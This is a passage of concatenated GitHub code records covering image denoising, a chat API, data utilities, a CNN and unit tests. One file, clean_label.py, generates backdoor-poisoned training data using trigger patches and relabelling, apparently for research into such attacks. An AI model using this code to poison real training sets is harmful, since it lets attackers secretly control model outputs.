5.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"3139277013","text":"import cv2\nimport os\nimport argparse\nimport glob\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\n# from IRCNN import DnCNN\nfrom utils import *\nfrom middle_and_lower import BRDNet\n# from IRCNN_9 import DnCNN\n\nimport time\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\nparser = argparse.ArgumentParser(description=\"DnCNN_Test\")\nparser.add_argument(\"--num_of_layers\", type=int, default=20, help=\"Number of total layers\")\nparser.add_argument(\"--logdir\", type=str, default=\"logs/middle_and_lower_patch5050-4744-S-25\", help='path of log files')\nparser.add_argument(\"--test_data\", type=str, default='Set12', help='test on Set12 or Set68 from gray image,'\n                                                 'test on Kodak24 or CBSD68 or McMaster from color image')\nparser.add_argument(\"--test_noiseL\", type=float, default=25, help='noise level used on test set')\nparser.add_argument(\"--test_epochs\", type=int, default=50, help=\"Number of test epochs\")\nparser.add_argument(\"--channels\", type=int, default=1, help='Number of input channels')\nparser.add_argument(\"--color\", type=bool, default=False, help=\"color or gray\")\nopt = parser.parse_args()\n\ndef normalize(data):\n    return data/255.\n\ndef main():\n\n    Total_Max_PSNR = 0\n    start_time = time.time()\n    for i in range(30, 51): ### load the net 1~50.pth weights\n\n        str_1 = 'net ' + str(i) + '.pth'\n        # Build model\n        print('\\nLoading model ...' + str_1)\n\n        # net = DnCNN(channels=opt.channels) #### when running IRCNN, num_of_layers=opt.num_of_layers should be removed\n        net = BRDNet(channels=opt.channels)\n        # model = net.cuda()\n        device_ids = [0]\n        model = nn.DataParallel(net, device_ids=device_ids).cuda()\n        model.load_state_dict(torch.load(os.path.join(opt.logdir, str_1))) #### load the weights\n        # model.load_state_dict(torch.load(os.path.join(opt.logdir, 'net 40.pth'))) #### load the weights\n        print('\\nLoading model ...finished\\n')\n\n        Max_PSNR = 0\n\n        for x in range(opt.test_epochs): ### test PSNR over 50 rounds and keep the maximum value\n\n            model.eval() ## switch the model to evaluation mode\n            # load data info\n            print('Loading data info ...\\n') ### dataset info\n            files_source = glob.glob(os.path.join('data', opt.test_data, '*.png' or '*.bmp' or '*.jpg'))\n            files_source.sort()\n            # process data\n\n            psnr_test = 0\n            # ssim_test = 0\n\n\n            for f in files_source:\n                # image\n                Img = cv2.imread(f)\n\n                # Img = np.transpose(Img, (2, 0, 1)) ## color image\n                # Img = normalize(np.float32(Img))\n                # Img = np.expand_dims(Img, 0)\n                #\n                # # TODO\n                # # Img = normalize(np.float32(Img[:,:,0])) ## grayscale image\n                # # Img = np.expand_dims(Img, 0)\n                # # Img = np.expand_dims(Img, 1)\n                if opt.color: ## color image preprocessing\n                    Img = cv2.cvtColor(Img, cv2.COLOR_BGR2RGB)\n                    Img = np.transpose(Img, (2, 0, 1))\n                    Img = normalize(np.float32(Img))\n                    Img = np.expand_dims(Img, 0)\n                    # print(Img.shape)\n                else: ## grayscale image preprocessing\n                    Img = normalize(np.float32(Img[:,:,0]))\n                    Img = np.expand_dims(Img, 0)\n                    Img = np.expand_dims(Img, 1)\n\n\n                # clean image\n                ISource = torch.Tensor(Img)\n                # noise\n                noise = torch.FloatTensor(ISource.size()).normal_(mean=0, std=opt.test_noiseL/255.)\n                # noisy image\n                INoisy = ISource + noise\n                # move to GPU\n                ISource, INoisy = Variable(ISource.cuda()), Variable(INoisy.cuda())\n\n\n\n                with torch.no_grad(): # this can save much memory\n                    Out = torch.clamp(INoisy-model(INoisy), 0., 1.)\n\n                ## if you are using older version of PyTorch, torch.no_grad() may not be supported\n                # ISource, INoisy = Variable(ISource.cuda(),volatile=True), Variable(INoisy.cuda(),volatile=True)\n                # Out = torch.clamp(INoisy-model(INoisy), 0., 1.)\n\n                psnr = batch_PSNR(Out, ISource, 1.)\n                # ssim = structural_similarity(Out, ISource,multichannel=True)\n\n                psnr_test += psnr\n                # ssim_test += ssim\n\n                print(\" '%s' PSNR : %f \" % (f, psnr))\n                # print(\" '%s' PSNR : %f SSIM :%f \" % (f, psnr, ssim))\n\n            psnr_test /= len(files_source)\n            # ssim_test /= len(files_source)\n\n            # record the average PSNR of this test round\n            print(\"\\n***************~~~~~~~~**************round %d PSNR on test data: %.3f\" % (x+1,psnr_test))\n            # print(\"\\n***************~~~~~~~~**************round %d PSNR on test data: %.3f\" % (i + 1, ssim_test))\n\n            if psnr_test > Max_PSNR:\n                Max_PSNR = psnr_test\n                j = x+1\n            # if ssim_test > Max_SSIM:\n            #     Max_SSIM = ssim_test\n\n        # record the maximum PSNR over the 50 test rounds for each net *.pth\n        print(\"\\n********************************************************round %d \"% j + \"Max_PSNR on \"+str_1+\" test data: %.3f\" % Max_PSNR)\n        # print(\"\\n*******************************************~~~~~~~~~~~~~~~~~~************* Max_SSIM on test data: %.3f\" % Max_SSIM)\n\n\n\n        if Max_PSNR > Total_Max_PSNR:\n            Total_Max_PSNR = Max_PSNR\n            str_2 = str_1\n            k = j\n        ## record the maximum PSNR over all net *.pth checkpoints\n        print(\"\\n*******************************************~~~~~~~~~~~~~~~~~~*************round %d \"% k + \"Total_Max_PSNR on \"+str_2+\" test data: %.3f \" % Total_Max_PSNR )\n        # # print(\"\\n*******************************************~~~~~~~~~~~~~~~~~~************* Max_SSIM on test data: %.3f\" % Max_SSIM)\n    end2_time = time.time()\n    print(\"\\n***************************** time cost: %.3f hours\" % ((end2_time-start_time)/3600))\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"lwh625382032/MBNet_pytorch","sub_path":"MBNet_PyTorch/auto_test.py","file_name":"auto_test.py","file_ext":"py","file_size_in_byte":6279,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"23200046204","text":"from typing import List\n\nfrom dependency_injector.wiring import Provide, inject\nfrom fastapi import APIRouter, Depends, Security, status\n\nfrom app.internal.services import Services\nfrom app.internal.services.message import MessageService\nfrom app.pkg import models\nfrom app.pkg.jwt import JwtAuthorizationCredentials, access_security\n\nrouter = APIRouter(prefix=\"/message\", tags=[\"Message\"])\n\n__all__ = [\"router\"]\n\n\n@router.get(\n    \"/\",\n    response_model=List[models.Message],\n    status_code=status.HTTP_200_OK,\n    description=\"Get all messages\",\n)\n@inject\nasync def read_all_room_messages(\n    query: models.ReadAllRoomMessagesQuery = Depends(),\n    message_service: MessageService = Depends(Provide[Services.message_service]),\n    credentials: JwtAuthorizationCredentials = Security(access_security),\n):\n    query.user_id = credentials.subject.get(\"user_id\")\n\n    return await message_service.read_all_room_messages(\n        query=query,\n    )\n\n\n@router.post(\n    \"/\",\n    response_model=models.Message,\n    status_code=status.HTTP_201_CREATED,\n    description=\"Create message\",\n)\n@inject\nasync def create_message(\n    cmd: models.CreateMessageCommand,\n    message_service: MessageService = Depends(Provide[Services.message_service]),\n    credentials: JwtAuthorizationCredentials = Security(access_security),\n):\n    cmd.user_id = credentials.subject.get(\"user_id\")\n\n    return await message_service.create_message(cmd=cmd)\n\n\n@router.get(\n    \"/{message_id:int}\",\n    response_model=models.Message,\n    status_code=status.HTTP_200_OK,\n    description=\"Read specific message\",\n)\n@inject\nasync def read_message(\n    message_id: int = models.MessageFields.id,\n    message_service: MessageService = Depends(Provide[Services.message_service]),\n    credentials: JwtAuthorizationCredentials = Security(access_security),\n):\n    return await message_service.read_message(\n        query=models.ReadMessageQuery(\n            id=message_id,\n            user_id=credentials.subject.get(\"user_id\"),\n        ),\n    )\n\n\n@router.put(\n    \"/{message_id:int}\",\n    response_model=models.Message,\n    status_code=status.HTTP_200_OK,\n    description=\"Update specific message\",\n)\n@inject\nasync def update_message(\n    cmd: models.UpdateMessageCommand,\n    message_service: MessageService = Depends(Provide[Services.message_service]),\n    credentials: JwtAuthorizationCredentials = Security(access_security),\n):\n    cmd.user_id = credentials.subject.get(\"user_id\")\n\n    return await message_service.update_message(cmd=cmd)\n\n\n@router.delete(\n    \"/{message_id:int}\",\n    response_model=models.Message,\n 
status_code=status.HTTP_200_OK,\n description=\"Delete specific message\",\n)\n@inject\nasync def delete_message(\n message_id: int = models.MessageFields.id,\n message_service: MessageService = Depends(Provide[Services.message_service]),\n credentials: JwtAuthorizationCredentials = Security(access_security),\n):\n return await message_service.delete_message(\n cmd=models.DeleteMessageCommand(\n id=message_id,\n user_id=credentials.subject.get(\"user_id\"),\n ),\n )\n","repo_name":"kylr42/chat-api","sub_path":"app/internal/routes/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"44023459901","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 25 23:37:36 2019\n\n@author: giudittaparolini\n\"\"\"\n\"\"\" \nThese are utilities methods called by main_part1. The utilities include methods to store prints and plots in the correct subfolder, save data to a dictionary \n\n\"\"\"\n\n\nimport os\nimport matplotlib.pyplot as plt\nimport csv\nimport itertools\nimport data_methods_part1 as dm\nimport pickle\n\n\n##########################################\n#Print methods\n\n# Print to a csv file in the folder 1_data\ndef print_csv_data (df, filename):\n df.to_csv(os.path.join(\"..\", \"1_data\", filename))\n\n\n#1 Print to a txt file in the folder 3_printouts\ndef print_txt_printouts (to_be_printed, filename):\n with open(os.path.join(\"..\", \"3_printouts\",\"part1\", filename),'w') as outfile:\n for item in to_be_printed:\n print(item, file=outfile)\n \n# Print to a csv file in the folder 3_printouts\ndef print_csv_printouts (df, filename):\n df.to_csv(os.path.join(\"..\", \"3_printouts\",\"part1\", filename), header=None)\n\n# Print a jpg figure in the folder 4_plots\ndef print_plot (fig, filename):\n plt.savefig(os.path.join(\"..\", \"4_plots\", \"part1\", filename))\n \ndef print_csv_data_headers (df, filename):\n df.to_csv(os.path.join(\"..\", \"1_data\", \"papers\", filename), header=df.columns)\n\n###########################################\n#Dictionary methods\n\n#Save a dictionary\ndef save_dict(my_dict):\n pickle_out = open(os.path.join(\"..\", \"3_printouts\", \"part1\", \"coathours_dict.pickle\"),\"wb\")\n pickle.dump(my_dict, pickle_out)\n pickle_out.close()\n\ndef print_coaut_dict(picklefile, filename):\n pickle_in = open(os.path.join(\"..\", \"3_printouts\", \"part1\", \"coathours_dict.pickle\"),\"rb\")\n my_dict = pickle.load(pickle_in)\n my_keys = my_dict.keys()\n my_keys_sorted = sorted(my_keys)\n with open(os.path.join(\"..\", \"3_printouts\", \"part1\", filename),'w') as outfile:\n for key in sorted(my_keys_sorted):\n print (\"Coauthor(s) of \" + key + \": \", my_dict[key], file=outfile)\n \n###########################################\n#Methods for aggregating data related to language counts (necessary to plot a readable pie chart) \n\n#Get the list of the language counts\ndef lang_count_list():\n with open(os.path.join(\"..\", \"3_printouts\", \"part1\", \"lang_counts.csv\")) as f:\n reader = csv.reader(f)\n my_list = list(reader)\n return my_list\n \n#Select the first 5 languages with highest counts\ndef main_lang_list():\n with open(os.path.join(\"..\", \"3_printouts\", \"part1\", \"lang_counts.csv\")) as f:\n reader = csv.reader(f)\n my_list = list(reader)\n my_list = lang_count_list()\n agg_list = []\n for item in my_list[0:5]:\n agg_list.append(item)\n return agg_list\n\n#Sum the remaining counts in the 
language counts list\ndef other_count():\n my_list = lang_count_list()\n other_list = my_list[5:]\n other_list = list(itertools.chain(*other_list))\n other_count_list = other_list[1::2]\n other_count = [ int(x) for x in other_count_list ] \n others = sum(other_count)\n return others\n\n#Generate the aggregate list\ndef agg_list():\n agg_list = []\n main_lang = main_lang_list()\n for item in main_lang:\n agg_list.append(item)\n others = str(other_count())\n other_element = [[\"Other\", others]]\n for item in other_element:\n agg_list.append(item)\n return agg_list\n\n#Generate the pair Other, other_count\n#def jourcat_count_list():\n #with open(os.path.join(\"..\", \"3_printouts\", \"part1\", \"lang_counts.csv\")) as f:\n #reader = csv.reader(f)\n #my_list = list(reader)\n #return my_list\n \n###########################\n#Methods for aggregating data related to journal category counts (necessary to plot a readable pie chart) \n\n\n#Generate a new dataframe df3 starting with the full dataframe and the categories dataframe\ndef get_journal_cat(df,df_cat):\n df1 = df.loc[df[\"Item Type\"] == \"journalArticle\"]\n df2 = df_cat.drop([\"Category2\", \"Language\"], axis=1)\n df3 = df1.merge(df2, on=\"Publication Title\")\n df4 = dm.colval_to_int(df3, \"Publication Year\")\n return df4\n\n#Load the counts of the items in each category\ndef jcat_count_list():\n with open(os.path.join(\"..\", \"3_printouts\", \"part1\", \"jourcat_counts.csv\")) as f:\n reader = csv.reader(f)\n my_list = list(reader)\n return my_list\n\n#Select the first 5 categories with highest counts\ndef main_jcat_list():\n with open(os.path.join(\"..\", \"1_data\",\"df_jour_cat.csv\")) as f:\n reader = csv.reader(f)\n my_list = list(reader)\n my_list = jcat_count_list()\n agg_list = []\n for item in my_list[0:5]:\n agg_list.append(item)\n return agg_list\n\n#Sum the remaining counts in the category counts list\ndef other_jcat_count():\n my_list = jcat_count_list()\n other_list = my_list[5:]\n other_list = list(itertools.chain(*other_list))\n other_count_list = other_list[1::2]\n other_count = [ int(x) for x in other_count_list ] \n others = sum(other_count)\n return others\n\n#Generate the aggregate list\ndef agg_jcat_list():\n agg_list = []\n main_lang = main_jcat_list()\n for item in main_lang:\n agg_list.append(item)\n others = str(other_jcat_count())\n other_element = [[\"Other\", others]]\n for item in other_element:\n agg_list.append(item)\n return agg_list\n\n###########################\n#Methods for working with lists\n \n#Flatten lists\ndef flatten(lis):\n new_lis = []\n for item in lis:\n if type(item) == type([]):\n new_lis.extend(flatten(item))\n else:\n new_lis.append(item)\n return new_lis\n\n","repo_name":"GParolini/learn_IT_girls_python","sub_path":"2_code_scripts/utilities_part1.py","file_name":"utilities_part1.py","file_ext":"py","file_size_in_byte":5654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28906924302","text":"import os\nimport torch\nimport random\nfrom torchvision.utils import save_image\n\nclass poison_generator():\n\n def __init__(self, img_size, dataset, adv_imgs, poison_rate, trigger_mark, trigger_mask, path, target_class=0):\n\n self.img_size = img_size\n self.dataset = dataset\n self.adv_imgs = adv_imgs\n self.poison_rate = poison_rate\n # self.trigger = trigger\n self.trigger_mark = trigger_mark\n self.trigger_mask = trigger_mask\n self.path = path # path to save the dataset\n self.target_class = target_class # by default : 
target_class = 0\n\n # shape of the patch trigger\n self.dx, self.dy = trigger_mask.shape\n\n # number of images\n self.num_img = len(dataset)\n\n def generate_poisoned_training_set(self):\n\n # poison for placing trigger pattern\n posx = self.img_size - self.dx\n posy = self.img_size - self.dy\n\n # random sampling\n all_target_indices = []\n all_other_indices = []\n for i in range(self.num_img):\n _, gt = self.dataset[i]\n if gt == self.target_class:\n all_target_indices.append(i)\n else:\n all_other_indices.append(i)\n random.shuffle(all_target_indices)\n random.shuffle(all_other_indices)\n num_target = len(all_target_indices)\n num_poison = int(self.num_img * self.poison_rate)\n #assert num_poison < num_target\n \n\n poison_indices = all_target_indices[:num_poison]\n poison_indices.sort() # increasing order\n\n img_set = []\n label_set = []\n pt = 0\n for i in range(self.num_img):\n img, gt = self.dataset[i]\n\n if pt < num_poison and poison_indices[pt] == i:\n gt = self.target_class\n img = self.adv_imgs[i] # use the adversarial version of image i\n img = img + self.trigger_mask * (self.trigger_mark - img)\n pt+=1\n\n # img_file_name = '%d.png' % i\n # img_file_path = os.path.join(self.path, img_file_name)\n # save_image(img, img_file_path)\n # print('[Generate Poisoned Set] Save %s' % img_file_path)\n \n img_set.append(img.unsqueeze(0))\n label_set.append(gt)\n\n img_set = torch.cat(img_set, dim=0)\n label_set = torch.LongTensor(label_set)\n #print(\"Poison indices:\", poison_indices)\n return img_set, poison_indices, label_set\n\n\n\n\nclass poison_transform():\n def __init__(self, img_size, trigger_mark, trigger_mask, target_class=0):\n self.img_size = img_size\n self.target_class = target_class # by default : target_class = 0\n self.trigger_mark = trigger_mark\n self.trigger_mask = trigger_mask\n self.dx, self.dy = trigger_mask.shape\n\n def transform(self, data, labels):\n\n data = data.clone()\n labels = labels.clone()\n\n # transform clean samples to poison samples\n labels[:] = self.target_class\n data = data + self.trigger_mask.to(data.device) * (self.trigger_mark.to(data.device) - data)\n\n # debug\n # from torchvision.utils import save_image\n # from torchvision import transforms\n # # preprocess = transforms.Normalize([0.4914, 0.4822, 0.4465], [0.247, 0.243, 0.261])\n # reverse_preprocess = transforms.Normalize([-0.4914/0.247, -0.4822/0.243, -0.4465/0.261], [1/0.247, 1/0.243, 1/0.261])\n # save_image(reverse_preprocess(data)[-7], 'a.png')\n\n return data, labels","repo_name":"vtu81/backdoor-toolbox","sub_path":"poison_tool_box/clean_label.py","file_name":"clean_label.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"53"} +{"seq_id":"22867153319","text":"\n\n# LeetCode: 824. 
Goat Latin\n\ndef toGoatLatin(S: str) -> str:\n if len(S) == 0:\n return None\n l = []\n v = [\"a\",\"e\",\"i\",\"o\",\"u\",\"A\",\"E\",\"I\",\"O\",\"U\"]\n ct = 0\n\n for w in S.split(\" \"):\n ct += 1\n \n if w[:1] in v:\n l.append(w + \"ma\" + \"a\" * ct)\n else:\n l.append(w[1:] + w[:1] + \"ma\"+ \"a\" * ct)\n\n return \" \".join(l)\n\ns = \"I speak Goat Latin\"\nprint(toGoatLatin(s))\n\ns = \"The quick brown fox jumped over the lazy dog\"\nprint(toGoatLatin(s))\n","repo_name":"jcravener/PythonWorkroom","sub_path":"GoatLatin.py","file_name":"GoatLatin.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40075847348","text":"from Model.autoWatering import AutoWatering\nfrom Model.lawn import LawnProperties\nimport pymysql.cursors\n\nclass test():\n\n def mysqlConnection(self):\n connection = pymysql.connect(host=\"\",\n user=\"turfswach\",\n password=\"\",\n db=\"\",\n charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor)\n if connection:\n return connection\n else:\n print(\"Connection expection error\")\n\n def turnWater(self, status, lawn):\n connection = self.mysqlConnection()\n try:\n with connection.cursor() as cursor:\n sql = \"Insert into logStatus (status, lawnID, city, country) VALUES (%s, %s, %s, %s)\"\n cursor.execute(sql, (status, lawn.lawnID, lawn.city, lawn.country))\n connection.commit()\n finally:\n connection.close()\n\ndef main():\n testWater = test()\n lawn1 = LawnProperties(1, \"vancouver\", \"canada\", \"1 Sennok Drive\", 10, 10, 0.75, 1.25,0)\n checkToIrrigate = AutoWatering(lawn1)\n\n if (checkToIrrigate.shouldWater):\n testWater.turnWater(\"1\", lawn1)\n else:\n testWater.turnWater(\"0\", lawn1)\n\nmain()\n","repo_name":"swachm/Turf","sub_path":"Model/testingOnOff.py","file_name":"testingOnOff.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5851633704","text":"#!/usr/bin/env python3\n\"\"\"\nA unit test module for testing ``models/base_model.py`` module.\n\"\"\"\n\nimport unittest\nfrom models.base_model import BaseModel\nfrom datetime import datetime\n\n\nclass Test_BaseModel(unittest.TestCase):\n \"\"\"\n Test the basic features of the BaseModel class.\n \"\"\"\n\n def test_instance_uuid_is_unique(self):\n \"\"\"\n This method of this test class tests for exactly\n what the name of the method reads.\n \"\"\"\n base1 = BaseModel()\n base2 = BaseModel()\n self.assertNotEqual(base1.id, base2.id)\n\n def test_instance_created_at_is_str(self):\n \"\"\"\n This method of this test class tests for exactly\n what the name of the method reads.\n \"\"\"\n base1 = BaseModel()\n self.assertEqual(type(base1.created_at), datetime)\n\n def test_instance_updated_at_is_str(self):\n \"\"\"\n This method of this test class tests for exactly\n what the name of the method reads.\n \"\"\"\n base1 = BaseModel()\n self.assertEqual(type(base1.updated_at), datetime)\n\n def test_save_method(self):\n \"\"\"\n This method of this test class tests for exactly\n what the name of the method reads.\n \"\"\"\n from time import sleep\n base1 = BaseModel()\n sleep(2)\n base1.save()\n self.assertNotEqual(base1.created_at, base1.updated_at)\n\n def test_BaseModel_save_method(self):\n \"\"\"\n This method tests save method of the class\n BaseModel.\n \"\"\"\n BaseModel().save()\n\n def test_string_representation(self):\n \"\"\"\n This method of this test class tests for exactly\n what 
the name of the method reads.\n \"\"\"\n base1 = BaseModel()\n string = \"[{}] ({}) {}\".format(base1.__class__.__name__,\n base1.id, base1.__dict__)\n self.assertEqual(base1.__str__(), string)\n\n def test_instance_dictionary(self):\n \"\"\"\n This method of this test class tests for exactly\n what the name of the method reads.\n \"\"\"\n base1 = BaseModel()\n base1.name = \"New Instance variable\"\n self.assertTrue(\"__class__\" in base1.to_dict())\n self.assertTrue(\"id\" in base1.to_dict())\n self.assertTrue(\"created_at\" in base1.to_dict())\n self.assertTrue(\"updated_at\" in base1.to_dict())\n self.assertTrue(\"name\" in base1.to_dict())\n\n def test_new_instance_from_dictionary(self):\n \"\"\"\n This method of this test class tests for exactly\n what the name of the method reads.\n \"\"\"\n base1 = BaseModel()\n model_json = base1.to_dict()\n base2 = BaseModel(**model_json)\n self.assertFalse(base1 is base2)\n\n def test_new_instance_datetime_variables(self):\n \"\"\"\n This method of this test class tests for exactly\n what the name of the method reads.\n \"\"\"\n base1 = BaseModel()\n model_json = base1.to_dict()\n base2 = BaseModel(**model_json)\n self.assertEqual(type(base2.created_at), datetime)\n self.assertEqual(type(base2.updated_at), datetime)\n\n def test_new_instance_properties_against_old(self):\n \"\"\"\n This method of this test class tests for exactly\n what the name of the method reads.\n \"\"\"\n base1 = BaseModel()\n base1.name = \"New_Instance\"\n model_json = base1.to_dict()\n base2 = BaseModel(**model_json)\n self.assertEqual(type(base1), type(base2))\n self.assertEqual(base1.id, base2.id)\n self.assertEqual(base1.created_at, base2.created_at)\n self.assertEqual(base1.updated_at, base2.updated_at)\n self.assertEqual(base1.name, base2.name)","repo_name":"Njokujr/AirBnB_clone","sub_path":"tests/test_models/test_base_model.py","file_name":"test_base_model.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20542019541","text":"import pickle\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom collections import OrderedDict\nfrom common.layers import Convolution, MaxPooling, ReLU, Affine, SoftmaxWithLoss\nfrom common.gradient import numerical_gradient\nfrom common.optimizer import RMSProp\n\ndef he(n1):\n \"\"\"\n Heの初期値を利用するための関数\n 返り値は、見かけの標準偏差\n \"\"\" \n return np.sqrt(2/n1)\n\n\nclass SimpleConvNet:\n def __init__(self, input_dim=(1, 28, 28), \n conv_param={'filter_num':30, 'filter_size':5, 'pad':0, 'stride':1},\n hidden_size=100, output_size=10, weight_init_std=0.01,weight_decay_lambda=0.01):\n \"\"\"\n input_size : 入力の配列形状(チャンネル数、画像の高さ、画像の幅)\n conv_param : 畳み込みの条件, dict形式  例、{'filter_num':30, 'filter_size':5, 'pad':0, 'stride':1}\n hidden_size : 隠れ層のノード数\n output_size : 出力層のノード数\n weight_init_std : 重みWを初期化する際に用いる標準偏差\n \"\"\"\n self.hidden_layer_num = 3\n self.weight_decay_lambda = weight_decay_lambda\n #filter_num = conv_param['filter_num']\n #filter_size = conv_param['filter_size']\n #filter_pad = conv_param['pad']\n #filter_stride = conv_param['stride']\n filter_num = 30\n filter_size = 5\n filter_pad = 0\n filter_stride = 1\n input_size = input_dim[1]\n conv_output_size = (input_size - filter_size + 2*filter_pad) / filter_stride + 1\n pool_output_size = int(filter_num * (conv_output_size/2) * (conv_output_size/2))\n\n # 重みの初期化\n self.params = {}\n std = weight_init_std\n self.params['W1'] = std * np.random.randn(filter_num, 
input_dim[0], filter_size, filter_size) # W1は畳み込みフィルターの重みになる\n self.params['b1'] = np.zeros(filter_num) #b1は畳み込みフィルターのバイアスになる\n #self.params['W2'] = std * np.random.randn(pool_output_size, hidden_size)\n self.params['b2'] = np.zeros(hidden_size)\n #self.params['W3'] = std * np.random.randn(hidden_size, output_size)\n self.params['b3'] = np.zeros(output_size)\n \n #Heの初期値を使用\n self.params['W2'] = np.random.randn(pool_output_size, hidden_size) * he(pool_output_size)\n self.params['W3'] = np.random.randn(hidden_size, output_size) * he(hidden_size)\n \n \n\n # レイヤの生成\n self.layers = OrderedDict()\n #self.layers['Conv1'] = Convolution(self.params['W1'], self.params['b1'],\n # conv_param['stride'], conv_param['pad']) # W1が畳み込みフィルターの重み, b1が畳み込みフィルターのバイアスになる\n self.layers['Conv1'] = Convolution(self.params['W1'], self.params['b1'],\n 1, 0) # W1が畳み込みフィルターの重み, b1が畳み込みフィルターのバイアスになる\n self.layers['ReLU1'] = ReLU()\n self.layers['Pool1'] = MaxPooling(pool_h=2, pool_w=2, stride=2)\n self.layers['Affine1'] = Affine(self.params['W2'], self.params['b2'])\n self.layers['ReLU2'] = ReLU()\n self.layers['Affine2'] = Affine(self.params['W3'], self.params['b3'])\n\n self.last_layer = SoftmaxWithLoss()\n\n def predict(self, x):\n for layer in self.layers.values():\n x = layer.forward(x)\n\n return x\n\n def loss(self, x, t):\n \"\"\"\n 損失関数\n x : 入力データ\n t : 教師データ\n \"\"\"\n y = self.predict(x)\n\n # 荷重減衰を考慮した損失を求める\n lmd = self.weight_decay_lambda \n weight_decay = 0\n for idx in range(1, self.hidden_layer_num + 1):\n W = self.params['W' + str(idx)]\n \n # 全ての行列Wについて、1/2* lambda * Σwij^2を求め、積算していく\n weight_decay += 0.5 * lmd * np.sum(W**2)\n\n return self.last_layer.forward(y, t) + weight_decay\n \n\n def accuracy(self, x, t, batch_size=100):\n if t.ndim != 1 : t = np.argmax(t, axis=1)\n \n acc = 0.0\n \n for i in range(int(x.shape[0] / batch_size)):\n tx = x[i*batch_size:(i+1)*batch_size]\n tt = t[i*batch_size:(i+1)*batch_size]\n y = self.predict(tx)\n y = np.argmax(y, axis=1)\n acc += np.sum(y == tt) \n \n return acc / x.shape[0]\n\n def gradient(self, x, t):\n \"\"\"勾配を求める(誤差逆伝播法)\n Parameters\n ----------\n x : 入力データ\n t : 教師データ\n\n 減衰を考慮した損失を求める\n lmd = self.weight_decay_lambda \n weight_decay = 0\n for idx in range(1, self.hidden_layer_num + 2):\n W = self.params['W' + str(idx)]\n \n # 全ての行列Wについて、1/2* lambda * Σwij^2を求め、積算していく\n weight_decay += 0.5 * lmd * np.sum(W**2)\n\n return self.lastLayer.forward(y, t) + weight_decay\n\n -------\n 各層の勾配を持ったディクショナリ変数\n grads['W1']、grads['W2']、...は各層の重み\n grads['b1']、grads['b2']、...は各層のバイアス\n \"\"\"\n # forward\n self.loss(x, t)\n\n # backward\n dout = 1\n dout = self.last_layer.backward(dout)\n\n layers = list(self.layers.values())\n layers.reverse()\n for layer in layers:\n dout = layer.backward(dout)\n\n # 設定\n # 荷重減衰を考慮しながら、dW, dbをgradsにまとめる\n lmd = self.weight_decay_lambda\n grads = {}\n grads['W1'], grads['b1'] = self.layers['Conv1'].dW, self.layers['Conv1'].db\n grads['W2'], grads['b2'] = self.layers['Affine1'].dW + lmd * self.layers['Affine1'].W, self.layers['Affine1'].db\n grads['W3'], grads['b3'] = self.layers['Affine2'].dW + lmd * self.layers['Affine2'].W, self.layers['Affine2'].db\n\n return grads\n \n def save_params(self, file_name=\"CNNparams.pkl\"):\n \n params = {}\n #for key, val in self.params.items():\n # params[key] = val\n\n print(\"W1Start\")\n params['W1'] = self.params['W1']\n print(\"b1Start\")\n params['b1'] = self.params['b1']\n print(\"W2Start\")\n params['W2'] = self.params['W2'] \n print(\"b2Start\")\n params['b2'] = self.params['b2']\n 
print(\"W3Start\")\n params['W3'] = self.params['W3'] \n print(\"b3Start\")\n params['b3'] = self.params['b3']\n \n with open(file_name, 'wb') as f:\n pickle.dump(params, f)\n \n def load_params(self, file_name=\"CNNparams.pkl\"):\n with open(file_name, 'rb') as f:\n params = pickle.load(f)\n #for key, val in params.items():\n # self.params[key] = val\n\n #for i, layer_idx in enumerate((0, 2, 5, 7, 10, 12, 15, 18)):\n # self.layers[layer_idx].W = self.params['W' + str(i+1)]\n # self.layers[layer_idx].b = self.params['b' + str(i+1)]\n self.params['W1'] = params['W1']\n self.params['b1'] = params['b1']\n self.params['W2'] = params['W2']\n self.params['b2'] = params['b2']\n self.params['W3'] = params['W3']\n self.params['b3'] = params['b3']\n\n def make_layers(self):\n # レイヤの生成\n self.layers = OrderedDict()\n self.layers['Conv1'] = Convolution(self.params['W1'], self.params['b1'],\n 1, 0) # W1が畳み込みフィルタの重み, b1が畳み込みフィルタのバイアスになる\n self.layers['ReLU1'] = ReLU()\n self.layers['Pool1'] = MaxPooling(pool_h=2, pool_w=2, stride=2)\n self.layers['Affine1'] = Affine(self.params['W2'], self.params['b2'])\n self.layers['ReLU2'] = ReLU()\n self.layers['Affine2'] = Affine(self.params['W3'], self.params['b3'])\n\n self.last_layer = SoftmaxWithLoss()\n ","repo_name":"sf-12/SkillUpAi-katakanaCNNmodel","sub_path":"node40 _dataNEW1_48000_wd1/CNN.py","file_name":"CNN.py","file_ext":"py","file_size_in_byte":8228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34097489126","text":"\"\"\"\n#############################\n# CompFigSep #\n# Compound Figure Separator #\n#############################\n\nGitHub: https://github.com/GaetanLepage/compound-figure-separator\n\nAuthor: Gaétan Lepage\nEmail: gaetan.lepage@grenoble-inp.fr\nDate: Spring 2020\n\nMaster's project @HES-SO (Sierre, SW)\n\nSupervisors: 